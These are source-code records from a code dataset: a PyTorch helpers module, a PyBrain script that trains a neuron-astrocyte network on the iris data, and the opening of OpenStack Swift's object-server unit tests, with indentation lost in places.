3233cf987d1529f760bef548e7a959952c37b30f | 98e1155518b292341e60908d12233a2b130cb043 | /helpers.py | cabba2a794108cc9b151778f12f403862f7ef99b | [] | no_license | bkj/pbtnet | 5443a580e1bca91e4c293ae2be8bdefb85a44ce0 | e8c7b11be92e5ff9e4facccf908e87611b7f72bb | refs/heads/master | 2021-05-02T13:49:50.894351 | 2018-02-08T03:48:25 | 2018-02-08T03:48:25 | 120,707,510 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 644 | py | #!/usr/bin/env python
"""
helpers.py
"""
from __future__ import print_function, division
import numpy as np
import torch
from torch import nn
from torch.autograd import Variable
def to_numpy(x):
if isinstance(x, Variable):
return to_numpy(x.data)
return x.cpu().numpy() if x.is_cuda else x.numpy()
def set_seeds(seed):
np.random.seed(seed)
_ = torch.manual_seed(seed + 123)
_ = torch.cuda.manual_seed(seed + 456)
class Flatten(nn.Module):
def forward(self, x):
return x.view(x.shape[0], -1)
def ablate(x, p):
return x * Variable(torch.rand((1,) + x.shape[1:]).cuda() > p).float()
| [
"bkj.322@gmail.com"
] | bkj.322@gmail.com |
90cb117fe81c46994501a28739c375f1f067da8f | 256644d14bd15f8e1a3e92c95b1655fd36681399 | /backup/mypybrain/angn.py | 2f5f9b3be43027253373cedda5b32243ca76c87d | [] | no_license | mfbx9da4/neuron-astrocyte-networks | 9d1c0ff45951e45ce1f8297ec62b69ee4159305a | bcf933491bdb70031f8d9c859fc17e0622e5b126 | refs/heads/master | 2021-01-01T10:13:59.099090 | 2018-06-03T12:32:13 | 2018-06-03T12:32:13 | 12,457,305 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,739 | py | # -*- coding: utf-8 -*-
"""
Created on Thu Feb 14 17:48:37 2013
The activation function was the hyperbolic tangent in all the
layers, except in the output layer where the threshold function was
used with a threshold value of 0.5 and an expected binary output.
All layers have astrocytes
Weight limiting? Decision of neurons will never change
Modification of weights - input or output weights? Potential implied
method:
* Input astrocytes modify output weights
* Hidden astrocytes modify both input and output weights
* Output astrocytes modify input weights
associated neuronal connections were active for at least n out of m
iterations (n: 2 to 3; m: 4, 6, 8), and 2) considering the time unit as
a single iteration, astrocytic effects lasted 4 to 8 iterations, and the
neuronal connection weights gradually increased (25%) or
decreased (50%) if the associated astrocyte was active or inactive,
respectively.
The combinations (Astrocytic Sensitivity, Neuron-glia power
connection: 2,4; 3,6; 2,6 y 3,8) were determined by trial-and-error,
and allowed an upper limit of 3, 4, 5 or 6 astrocytic activations,
respectively.
@author: david
"""
import random
import datetime
import os
from pybrain.datasets import ClassificationDataSet
from pybrain.utilities import percentError
from pybrain.supervised.trainers import BackpropTrainer
from pybrain.structure import TanhLayer
from pybrain.tools.shortcuts import buildNetwork
from numpy import array, ones, zeros, append
import numpy as np
from astrocyte_layer import AstrocyteLayer
from plotting.plotters import plotPercentageErrorBar, plotPercentageNoErrorBar
from mymodules.threshold import ThresholdLayer
def createDS():
# taken from iris data set at machine learning repository
pat = [[[5.1, 3.5, 1.4, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.9, 3.0, 1.4, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.7, 3.2, 1.3, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.6, 3.1, 1.5, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.0, 3.6, 1.4, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.4, 3.9, 1.7, 0.4], [1, 0, 0], [0], ['Iris-setosa']], [[4.6, 3.4, 1.4, 0.3], [1, 0, 0], [0], ['Iris-setosa']], [[5.0, 3.4, 1.5, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.4, 2.9, 1.4, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.9, 3.1, 1.5, 0.1], [1, 0, 0], [0], ['Iris-setosa']], [[5.4, 3.7, 1.5, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.8, 3.4, 1.6, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.8, 3.0, 1.4, 0.1], [1, 0, 0], [0], ['Iris-setosa']], [[4.3, 3.0, 1.1, 0.1], [1, 0, 0], [0], ['Iris-setosa']], [[5.8, 4.0, 1.2, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.7, 4.4, 1.5, 0.4], [1, 0, 0], [0], ['Iris-setosa']], [[5.4, 3.9, 1.3, 0.4], [1, 0, 0], [0], ['Iris-setosa']], [[5.1, 3.5, 1.4, 0.3], [1, 0, 0], [0], ['Iris-setosa']], [[5.7, 3.8, 1.7, 0.3], [1, 0, 0], [0], ['Iris-setosa']], [[5.1, 3.8, 1.5, 0.3], [1, 0, 0], [0], ['Iris-setosa']], [[5.4, 3.4, 1.7, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.1, 3.7, 1.5, 0.4], [1, 0, 0], [0], ['Iris-setosa']], [[4.6, 3.6, 1.0, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.1, 3.3, 1.7, 0.5], [1, 0, 0], [0], ['Iris-setosa']], [[4.8, 3.4, 1.9, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.0, 3.0, 1.6, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.0, 3.4, 1.6, 0.4], [1, 0, 0], [0], ['Iris-setosa']], [[5.2, 3.5, 1.5, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.2, 3.4, 1.4, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.7, 3.2, 1.6, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.8, 3.1, 1.6, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.4, 3.4, 1.5, 0.4], [1, 0, 0], [0], ['Iris-setosa']], [[5.2, 4.1, 1.5, 0.1], [1, 0, 0], [0], ['Iris-setosa']], [[5.5, 4.2, 1.4, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.9, 3.1, 1.5, 0.1], [1, 0, 0], [0], 
['Iris-setosa']], [[5.0, 3.2, 1.2, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.5, 3.5, 1.3, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.9, 3.1, 1.5, 0.1], [1, 0, 0], [0], ['Iris-setosa']], [[4.4, 3.0, 1.3, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.1, 3.4, 1.5, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.0, 3.5, 1.3, 0.3], [1, 0, 0], [0], ['Iris-setosa']], [[4.5, 2.3, 1.3, 0.3], [1, 0, 0], [0], ['Iris-setosa']], [[4.4, 3.2, 1.3, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.0, 3.5, 1.6, 0.6], [1, 0, 0], [0], ['Iris-setosa']], [[5.1, 3.8, 1.9, 0.4], [1, 0, 0], [0], ['Iris-setosa']], [[4.8, 3.0, 1.4, 0.3], [1, 0, 0], [0], ['Iris-setosa']], [[5.1, 3.8, 1.6, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[4.6, 3.2, 1.4, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.3, 3.7, 1.5, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[5.0, 3.3, 1.4, 0.2], [1, 0, 0], [0], ['Iris-setosa']], [[7.0, 3.2, 4.7, 1.4], [0, 1, 0], [1], ['Iris-versicolor']], [[6.4, 3.2, 4.5, 1.5], [0, 1, 0], [1], ['Iris-versicolor']], [[6.9, 3.1, 4.9, 1.5], [0, 1, 0], [1], ['Iris-versicolor']], [[5.5, 2.3, 4.0, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[6.5, 2.8, 4.6, 1.5], [0, 1, 0], [1], ['Iris-versicolor']], [[5.7, 2.8, 4.5, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[6.3, 3.3, 4.7, 1.6], [0, 1, 0], [1], ['Iris-versicolor']], [[4.9, 2.4, 3.3, 1.0], [0, 1, 0], [1], ['Iris-versicolor']], [[6.6, 2.9, 4.6, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[5.2, 2.7, 3.9, 1.4], [0, 1, 0], [1], ['Iris-versicolor']], [[5.0, 2.0, 3.5, 1.0], [0, 1, 0], [1], ['Iris-versicolor']], [[5.9, 3.0, 4.2, 1.5], [0, 1, 0], [1], ['Iris-versicolor']], [[6.0, 2.2, 4.0, 1.0], [0, 1, 0], [1], ['Iris-versicolor']], [[6.1, 2.9, 4.7, 1.4], [0, 1, 0], [1], ['Iris-versicolor']], [[5.6, 2.9, 3.6, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[6.7, 3.1, 4.4, 1.4], [0, 1, 0], [1], ['Iris-versicolor']], [[5.6, 3.0, 4.5, 1.5], [0, 1, 0], [1], ['Iris-versicolor']], [[5.8, 2.7, 4.1, 1.0], [0, 1, 0], [1], ['Iris-versicolor']], [[6.2, 2.2, 4.5, 1.5], [0, 
1, 0], [1], ['Iris-versicolor']], [[5.6, 2.5, 3.9, 1.1], [0, 1, 0], [1], ['Iris-versicolor']], [[5.9, 3.2, 4.8, 1.8], [0, 1, 0], [1], ['Iris-versicolor']], [[6.1, 2.8, 4.0, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[6.3, 2.5, 4.9, 1.5], [0, 1, 0], [1], ['Iris-versicolor']], [[6.1, 2.8, 4.7, 1.2], [0, 1, 0], [1], ['Iris-versicolor']], [[6.4, 2.9, 4.3, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[6.6, 3.0, 4.4, 1.4], [0, 1, 0], [1], ['Iris-versicolor']], [[6.8, 2.8, 4.8, 1.4], [0, 1, 0], [1], ['Iris-versicolor']], [[6.7, 3.0, 5.0, 1.7], [0, 1, 0], [1], ['Iris-versicolor']], [[6.0, 2.9, 4.5, 1.5], [0, 1, 0], [1], ['Iris-versicolor']], [[5.7, 2.6, 3.5, 1.0], [0, 1, 0], [1], ['Iris-versicolor']], [[5.5, 2.4, 3.8, 1.1], [0, 1, 0], [1], ['Iris-versicolor']], [[5.5, 2.4, 3.7, 1.0], [0, 1, 0], [1], ['Iris-versicolor']], [[5.8, 2.7, 3.9, 1.2], [0, 1, 0], [1], ['Iris-versicolor']], [[6.0, 2.7, 5.1, 1.6], [0, 1, 0], [1], ['Iris-versicolor']], [[5.4, 3.0, 4.5, 1.5], [0, 1, 0], [1], ['Iris-versicolor']], [[6.0, 3.4, 4.5, 1.6], [0, 1, 0], [1], ['Iris-versicolor']], [[6.7, 3.1, 4.7, 1.5], [0, 1, 0], [1], ['Iris-versicolor']], [[6.3, 2.3, 4.4, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[5.6, 3.0, 4.1, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[5.5, 2.5, 4.0, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[5.5, 2.6, 4.4, 1.2], [0, 1, 0], [1], ['Iris-versicolor']], [[6.1, 3.0, 4.6, 1.4], [0, 1, 0], [1], ['Iris-versicolor']], [[5.8, 2.6, 4.0, 1.2], [0, 1, 0], [1], ['Iris-versicolor']], [[5.0, 2.3, 3.3, 1.0], [0, 1, 0], [1], ['Iris-versicolor']], [[5.6, 2.7, 4.2, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[5.7, 3.0, 4.2, 1.2], [0, 1, 0], [1], ['Iris-versicolor']], [[5.7, 2.9, 4.2, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[6.2, 2.9, 4.3, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[5.1, 2.5, 3.0, 1.1], [0, 1, 0], [1], ['Iris-versicolor']], [[5.7, 2.8, 4.1, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[6.3, 3.3, 6.0, 2.5], [0, 0, 1], [2], ['Iris-virginica']], [[5.8, 2.7, 
5.1, 1.9], [0, 0, 1], [2], ['Iris-virginica']], [[7.1, 3.0, 5.9, 2.1], [0, 0, 1], [2], ['Iris-virginica']], [[6.3, 2.9, 5.6, 1.8], [0, 0, 1], [2], ['Iris-virginica']], [[6.5, 3.0, 5.8, 2.2], [0, 0, 1], [2], ['Iris-virginica']], [[7.6, 3.0, 6.6, 2.1], [0, 0, 1], [2], ['Iris-virginica']], [[4.9, 2.5, 4.5, 1.7], [0, 0, 1], [2], ['Iris-virginica']], [[7.3, 2.9, 6.3, 1.8], [0, 0, 1], [2], ['Iris-virginica']], [[6.7, 2.5, 5.8, 1.8], [0, 0, 1], [2], ['Iris-virginica']], [[7.2, 3.6, 6.1, 2.5], [0, 0, 1], [2], ['Iris-virginica']], [[6.5, 3.2, 5.1, 2.0], [0, 0, 1], [2], ['Iris-virginica']], [[6.4, 2.7, 5.3, 1.9], [0, 0, 1], [2], ['Iris-virginica']], [[6.8, 3.0, 5.5, 2.1], [0, 0, 1], [2], ['Iris-virginica']], [[5.7, 2.5, 5.0, 2.0], [0, 0, 1], [2], ['Iris-virginica']], [[5.8, 2.8, 5.1, 2.4], [0, 0, 1], [2], ['Iris-virginica']], [[6.4, 3.2, 5.3, 2.3], [0, 0, 1], [2], ['Iris-virginica']], [[6.5, 3.0, 5.5, 1.8], [0, 0, 1], [2], ['Iris-virginica']], [[7.7, 3.8, 6.7, 2.2], [0, 0, 1], [2], ['Iris-virginica']], [[7.7, 2.6, 6.9, 2.3], [0, 0, 1], [2], ['Iris-virginica']], [[6.0, 2.2, 5.0, 1.5], [0, 0, 1], [2], ['Iris-virginica']], [[6.9, 3.2, 5.7, 2.3], [0, 0, 1], [2], ['Iris-virginica']], [[5.6, 2.8, 4.9, 2.0], [0, 0, 1], [2], ['Iris-virginica']], [[7.7, 2.8, 6.7, 2.0], [0, 0, 1], [2], ['Iris-virginica']], [[6.3, 2.7, 4.9, 1.8], [0, 0, 1], [2], ['Iris-virginica']], [[6.7, 3.3, 5.7, 2.1], [0, 0, 1], [2], ['Iris-virginica']], [[7.2, 3.2, 6.0, 1.8], [0, 0, 1], [2], ['Iris-virginica']], [[6.2, 2.8, 4.8, 1.8], [0, 0, 1], [2], ['Iris-virginica']], [[6.1, 3.0, 4.9, 1.8], [0, 0, 1], [2], ['Iris-virginica']], [[6.4, 2.8, 5.6, 2.1], [0, 0, 1], [2], ['Iris-virginica']], [[7.2, 3.0, 5.8, 1.6], [0, 0, 1], [2], ['Iris-virginica']], [[7.4, 2.8, 6.1, 1.9], [0, 0, 1], [2], ['Iris-virginica']], [[7.9, 3.8, 6.4, 2.0], [0, 0, 1], [2], ['Iris-virginica']], [[6.4, 2.8, 5.6, 2.2], [0, 0, 1], [2], ['Iris-virginica']], [[6.3, 2.8, 5.1, 1.5], [0, 0, 1], [2], ['Iris-virginica']], [[6.1, 2.6, 5.6, 1.4], [0, 0, 
1], [2], ['Iris-virginica']], [[7.7, 3.0, 6.1, 2.3], [0, 0, 1], [2], ['Iris-virginica']], [[6.3, 3.4, 5.6, 2.4], [0, 0, 1], [2], ['Iris-virginica']], [[6.4, 3.1, 5.5, 1.8], [0, 0, 1], [2], ['Iris-virginica']], [[6.0, 3.0, 4.8, 1.8], [0, 0, 1], [2], ['Iris-virginica']], [[6.9, 3.1, 5.4, 2.1], [0, 0, 1], [2], ['Iris-virginica']], [[6.7, 3.1, 5.6, 2.4], [0, 0, 1], [2], ['Iris-virginica']], [[6.9, 3.1, 5.1, 2.3], [0, 0, 1], [2], ['Iris-virginica']], [[5.8, 2.7, 5.1, 1.9], [0, 0, 1], [2], ['Iris-virginica']], [[6.8, 3.2, 5.9, 2.3], [0, 0, 1], [2], ['Iris-virginica']], [[6.7, 3.3, 5.7, 2.5], [0, 0, 1], [2], ['Iris-virginica']], [[6.7, 3.0, 5.2, 2.3], [0, 0, 1], [2], ['Iris-virginica']], [[6.3, 2.5, 5.0, 1.9], [0, 0, 1], [2], ['Iris-virginica']], [[6.5, 3.0, 5.2, 2.0], [0, 0, 1], [2], ['Iris-virginica']], [[6.2, 3.4, 5.4, 2.3], [0, 0, 1], [2], ['Iris-virginica']], [[5.9, 3.0, 5.1, 1.8], [0, 0, 1], [2], ['Iris-virginica']]]
alldata = ClassificationDataSet(4, 1, nb_classes=3,
class_labels=['set', 'vers', 'virg'])
for p in pat:
t = p[2]
alldata.addSample(p[0], t)
tstdata, trndata = alldata.splitWithProportion(0.33)
trndata._convertToOneOfMany()
tstdata._convertToOneOfMany()
return trndata, tstdata
"""
Although output layer should be binary with threshold bias layer of 0.5
and input layer should be tanh
"""
def createNN(indim, hiddim, outdim):
    """Build a bias-free feed-forward network.

    The hidden layer uses the hyperbolic tangent and the output layer a
    threshold activation, as required by the NGA model described in the
    module docstring.
    """
    net = buildNetwork(indim, hiddim, outdim,
                       bias=False,
                       hiddenclass=TanhLayer,
                       outclass=ThresholdLayer)
    net.sortModules()
    return net
def associateAstrocyteLayers(nn):
    """Attach an astrocyte layer to the hidden and to the output neurons.

    The hidden-layer astrocytes monitor the input->hidden connection and the
    output-layer astrocytes monitor the hidden->output connection.
    Returns ``(hiddenAstrocyteLayer, outputAstrocyteLayer)``.
    """
    (in_to_hidden,) = nn.connections[nn['in']]
    (hidden_to_out,) = nn.connections[nn['hidden0']]
    hidden_astrocytes = AstrocyteLayer(nn['hidden0'], in_to_hidden)
    output_astrocytes = AstrocyteLayer(nn['out'], hidden_to_out)
    return hidden_astrocytes, output_astrocytes
repeats = 3  # number of independent training trials
iterations = 500  # training epochs per trial
# percent-error histories accumulated by main(): one list per trial
all_trn_results = []
all_tst_results = []
def trainNGA(nn, trndata, hiddenAstrocyteLayer, outputAstrocyteLayer):
    """One neuron-glia training pass over the training set.

    For each input pattern (presented in random order) the network is
    activated, then the astrocyte layers are updated for their configured
    number of processing iterations, after which both layers are reset
    before the next pattern.
    """
    inputs = list(trndata['input'])
    random.shuffle(inputs)
    # BUG FIX: the original iterated trndata['input'] directly, so the
    # shuffled copy was never used and presentation order was fixed.
    for inpt in inputs:
        nn.activate(inpt)
        for m in range(hiddenAstrocyteLayer.astrocyte_processing_iters):
            hiddenAstrocyteLayer.update()
            outputAstrocyteLayer.update()
        hiddenAstrocyteLayer.reset()
        outputAstrocyteLayer.reset()
def main():
trndata, tstdata = createDS()
for repeat in xrange(repeats):
print 'trial', repeat
iter_trn_results = []
iter_tst_results = []
nn = createNN(4, 6, 3)
nn.randomize()
hiddenAstrocyteLayer, outputAstrocyteLayer = \
associateAstrocyteLayers(nn)
trainer = BackpropTrainer(nn, dataset=trndata, learningrate=0.01,
momentum=0.1, verbose=False, weightdecay=0.0)
for grand_iter in xrange(iterations):
if grand_iter == 0:
trainer.train()
# trainNGA(nn, trndata, hiddenAstrocyteLayer, outputAstrocyteLayer)
trainer.train()
trnresult = percentError(trainer.testOnClassData(),
trndata['class'])
iter_trn_results.append(trnresult)
tstresult = percentError(trainer.testOnClassData(dataset=tstdata),
tstdata['class'])
iter_tst_results.append(tstresult)
if not grand_iter % 100:
print 'epoch %4d' % trainer.totalepochs, 'train error %5.2f%%'\
% trnresult, 'test error %5.2f%%' % tstresult
# MAKE SURE NOT IN ITER LOOP
all_trn_results.append(iter_trn_results)
all_tst_results.append(iter_tst_results)
assert array(iter_trn_results).shape == (iterations, ), \
array(iter_trn_results).shape
assert array(iter_tst_results).shape == (iterations, ), \
array(iter_tst_results).shape
assert array(all_trn_results).shape == (repeats, iterations), \
array(all_trn_results).shape
assert array(all_tst_results).shape == (repeats, iterations), \
array(all_tst_results).shape
a = datetime.datetime.now(). utctimetuple()
time_string = str(a[3]) + str(a[4]) + '_' + str(a[2]) + '-' + \
str(a[1]) + '-' + str(a[0])
if os.environ['OS'] == 'Windows_NT':
sep = '\\'
else:
sep = '/'
pybrain_dir = os.getcwd() + sep
assert pybrain_dir[-10:-1] == 'mypybrain', \
'is actually this ' + pybrain_dir[-10:-1]
os.mkdir(pybrain_dir + 'experiment_results' + sep + time_string)
trnf = open(pybrain_dir + 'experiment_results' + sep + time_string +
'/all_trn_results.out', 'w')
np.savetxt(trnf, all_trn_results)
tstf = open(pybrain_dir + 'experiment_results' + sep + time_string +
'/all_tst_results.out', 'w')
np.savetxt(tstf, all_tst_results)
if __name__ == '__main__':
main()
| [
"dalberto.adler@gmail.com"
] | dalberto.adler@gmail.com |
a0c8ab45ee293002eb2896412bc5d8ad46314948 | f62fd455e593a7ad203a5c268e23129473d968b6 | /swift-2.13.1/test/unit/obj/test_server.py | 03e40a730d03da0616400cb61955cb0a5ba0eec7 | [
"Apache-2.0"
] | permissive | MinbinGong/OpenStack-Ocata | 5d17bcd47a46d48ff9e71e2055f667836174242f | 8b7650128cfd2fdf5d6c8bc4613ac2e396fb2fb3 | refs/heads/master | 2021-06-23T05:24:37.799927 | 2017-08-14T04:33:05 | 2017-08-14T04:33:05 | 99,709,985 | 0 | 2 | null | 2020-07-22T22:06:22 | 2017-08-08T15:48:44 | Python | UTF-8 | Python | false | false | 340,294 | py | # coding: utf-8
# Copyright (c) 2010-2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for swift.obj.server"""
import six.moves.cPickle as pickle
import datetime
import json
import errno
import operator
import os
import mock
import six
from six import StringIO
import unittest
import math
import random
from shutil import rmtree
from time import gmtime, strftime, time, struct_time
from tempfile import mkdtemp
from hashlib import md5
import tempfile
from collections import defaultdict
from contextlib import contextmanager
from textwrap import dedent
from eventlet import sleep, spawn, wsgi, Timeout, tpool, greenthread
from eventlet.green import httplib
from nose import SkipTest
from swift import __version__ as swift_version
from swift.common.http import is_success
from test import listen_zero
from test.unit import FakeLogger, debug_logger, mocked_http_conn, \
make_timestamp_iter, DEFAULT_TEST_EC_TYPE
from test.unit import connect_tcp, readuntil2crlfs, patch_policies, \
encode_frag_archive_bodies
from swift.obj import server as object_server
from swift.obj import updater
from swift.obj import diskfile
from swift.common import utils, bufferedhttp
from swift.common.header_key_dict import HeaderKeyDict
from swift.common.utils import hash_path, mkdirs, normalize_timestamp, \
NullLogger, storage_directory, public, replication, encode_timestamps, \
Timestamp
from swift.common import constraints
from swift.common.swob import Request, WsgiBytesIO
from swift.common.splice import splice
from swift.common.storage_policy import (StoragePolicy, ECStoragePolicy,
POLICIES, EC_POLICY)
from swift.common.exceptions import DiskFileDeviceUnavailable, \
DiskFileNoSpace, DiskFileQuarantined
from swift.common.wsgi import init_request_processor
def mock_time(*args, **kwargs):
    """Stand-in for time.time() that reports a fixed instant (5000.0),
    ignoring any arguments it is called with."""
    return 5000.0
# Policies installed by @patch_policies on the test class: policy 0 is the
# default replication policy, policy 1 an EC policy with 10 data + 4 parity
# fragments using the default test EC backend.
test_policies = [
    StoragePolicy(0, name='zero', is_default=True),
    ECStoragePolicy(1, name='one', ec_type=DEFAULT_TEST_EC_TYPE,
                    ec_ndata=10, ec_nparity=4),
]
@contextmanager
def fake_spawn():
    """
    Spawn and capture the result so we can later wait on it. This means we can
    test code executing in a greenthread but still wait() on the result to
    ensure that the method has completed.
    """
    greenlets = []

    def _inner_fake_spawn(func, *a, **kw):
        # run the function in a real greenthread, but remember the handle
        gt = greenthread.spawn(func, *a, **kw)
        greenlets.append(gt)
        return gt

    # replace both the module attribute and the patched reference so any
    # call path through object_server.spawn is captured
    object_server.spawn = _inner_fake_spawn
    with mock.patch('swift.obj.server.spawn', _inner_fake_spawn):
        try:
            yield
        finally:
            # block until every captured greenthread has finished
            for gt in greenlets:
                gt.wait()
@patch_policies(test_policies)
class TestObjectController(unittest.TestCase):
"""Test swift.obj.server.ObjectController"""
    def setUp(self):
        """Set up for testing swift.object.server.ObjectController"""
        # fix the hash path suffix/prefix so object hashes are deterministic
        utils.HASH_PATH_SUFFIX = 'endcap'
        utils.HASH_PATH_PREFIX = 'startcap'
        self.tmpdir = mkdtemp()
        self.testdir = os.path.join(self.tmpdir,
                                    'tmp_test_object_server_ObjectController')
        mkdirs(os.path.join(self.testdir, 'sda1'))
        self.conf = {'devices': self.testdir, 'mount_check': 'false',
                     'container_update_timeout': 0.0}
        self.object_controller = object_server.ObjectController(
            self.conf, logger=debug_logger())
        self.object_controller.bytes_per_sync = 1
        # make tpool.execute synchronous for the duration of the test;
        # restored in tearDown from self._orig_tpool_exc
        self._orig_tpool_exc = tpool.execute
        tpool.execute = lambda f, *args, **kwargs: f(*args, **kwargs)
        self.df_mgr = diskfile.DiskFileManager(self.conf,
                                               self.object_controller.logger)
        self.logger = debug_logger('test-object-controller')
        self.ts = make_timestamp_iter()
        self.ec_policies = [p for p in POLICIES if p.policy_type == EC_POLICY]
    def tearDown(self):
        """Tear down for testing swift.object.server.ObjectController"""
        # remove the temp device tree and restore the real tpool.execute
        rmtree(self.tmpdir)
        tpool.execute = self._orig_tpool_exc
    def _stage_tmp_dir(self, policy):
        # pre-create the per-policy tmp dir on sda1 so PUTs have a staging area
        mkdirs(os.path.join(self.testdir, 'sda1',
                            diskfile.get_tmp_dir(policy)))
    def iter_policies(self):
        # Generator over all configured policies; also records the current
        # policy on self.policy so helpers called inside the loop can see it.
        for policy in POLICIES:
            self.policy = policy
            yield policy
def check_all_api_methods(self, obj_name='o', alt_res=None):
path = '/sda1/p/a/c/%s' % obj_name
body = 'SPECIAL_STRING'
op_table = {
"PUT": (body, alt_res or 201, ''), # create one
"GET": ('', alt_res or 200, body), # check it
"POST": ('', alt_res or 202, ''), # update it
"HEAD": ('', alt_res or 200, ''), # head it
"DELETE": ('', alt_res or 204, '') # delete it
}
for method in ["PUT", "GET", "POST", "HEAD", "DELETE"]:
in_body, res, out_body = op_table[method]
timestamp = normalize_timestamp(time())
req = Request.blank(
path, environ={'REQUEST_METHOD': method},
headers={'X-Timestamp': timestamp,
'Content-Type': 'application/x-test'})
req.body = in_body
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, res)
if out_body and (200 <= res < 300):
self.assertEqual(resp.body, out_body)
    def test_REQUEST_SPECIAL_CHARS(self):
        # object names containing non-ASCII and percent/slash characters
        # must work for every API verb
        obj = 'special昆%20/%'
        self.check_all_api_methods(obj)
    def test_device_unavailable(self):
        # every verb must return 507 when the diskfile layer reports the
        # device as unavailable
        def raise_disk_unavail(*args, **kwargs):
            raise DiskFileDeviceUnavailable()

        self.object_controller.get_diskfile = raise_disk_unavail
        self.check_all_api_methods(alt_res=507)
    def test_allowed_headers(self):
        # headers configured via 'allowed_headers' become updatable object
        # metadata; content-length must be filtered out even if configured
        dah = ['content-disposition', 'content-encoding', 'x-delete-at',
               'x-object-manifest', 'x-static-large-object']
        conf = {'devices': self.testdir, 'mount_check': 'false',
                'allowed_headers': ','.join(['content-length'] + dah)}
        self.object_controller = object_server.ObjectController(
            conf, logger=debug_logger())
        self.assertEqual(self.object_controller.allowed_headers, set(dah))
    def test_POST_update_meta(self):
        """POST replaces user metadata but preserves sysmeta and data.

        Walks through PUT + several POSTs, checking the exact response
        headers after each step, first with a custom allowed_headers set and
        then with the server defaults.
        """
        # Test swift.obj.server.ObjectController.POST
        original_headers = self.object_controller.allowed_headers
        test_headers = 'content-encoding foo bar'.split()
        self.object_controller.allowed_headers = set(test_headers)
        put_timestamp = normalize_timestamp(time())
        headers = {'X-Timestamp': put_timestamp,
                   'Content-Type': 'application/x-test',
                   'Foo': 'fooheader',
                   'Baz': 'bazheader',
                   'X-Object-Sysmeta-Color': 'blue',
                   'X-Object-Transient-Sysmeta-Shape': 'circle',
                   'X-Object-Meta-1': 'One',
                   'X-Object-Meta-Two': 'Two'}
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
                            headers=headers)
        req.body = 'VERIFY'
        etag = '"%s"' % md5('VERIFY').hexdigest()
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        self.assertEqual(dict(resp.headers), {
            'Content-Type': 'text/html; charset=UTF-8',
            'Content-Length': str(len(resp.body)),
            'Etag': etag,
        })
        # POST new user meta; sysmeta set at PUT time must survive
        post_timestamp = normalize_timestamp(time())
        headers = {'X-Timestamp': post_timestamp,
                   'X-Object-Meta-3': 'Three',
                   'X-Object-Meta-4': 'Four',
                   'Content-Encoding': 'gzip',
                   'Foo': 'fooheader',
                   'Bar': 'barheader',
                   'Content-Type': 'application/x-test'}
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'POST'},
                            headers=headers)
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 202)
        self.assertEqual(dict(resp.headers), {
            'Content-Type': 'text/html; charset=UTF-8',
            'Content-Length': str(len(resp.body)),
            'X-Object-Sysmeta-Color': 'blue',
        })
        req = Request.blank('/sda1/p/a/c/o')
        resp = req.get_response(self.object_controller)
        expected_headers = {
            'Content-Type': 'application/x-test',
            'Content-Length': '6',
            'Etag': etag,
            'X-Object-Sysmeta-Color': 'blue',
            'X-Object-Meta-3': 'Three',
            'X-Object-Meta-4': 'Four',
            'Foo': 'fooheader',
            'Bar': 'barheader',
            'Content-Encoding': 'gzip',
            'X-Backend-Timestamp': post_timestamp,
            'X-Timestamp': post_timestamp,
            'X-Backend-Data-Timestamp': put_timestamp,
            'X-Backend-Durable-Timestamp': put_timestamp,
            'Last-Modified': strftime(
                '%a, %d %b %Y %H:%M:%S GMT',
                gmtime(math.ceil(float(post_timestamp)))),
        }
        self.assertEqual(dict(resp.headers), expected_headers)
        # HEAD must report the same headers as GET
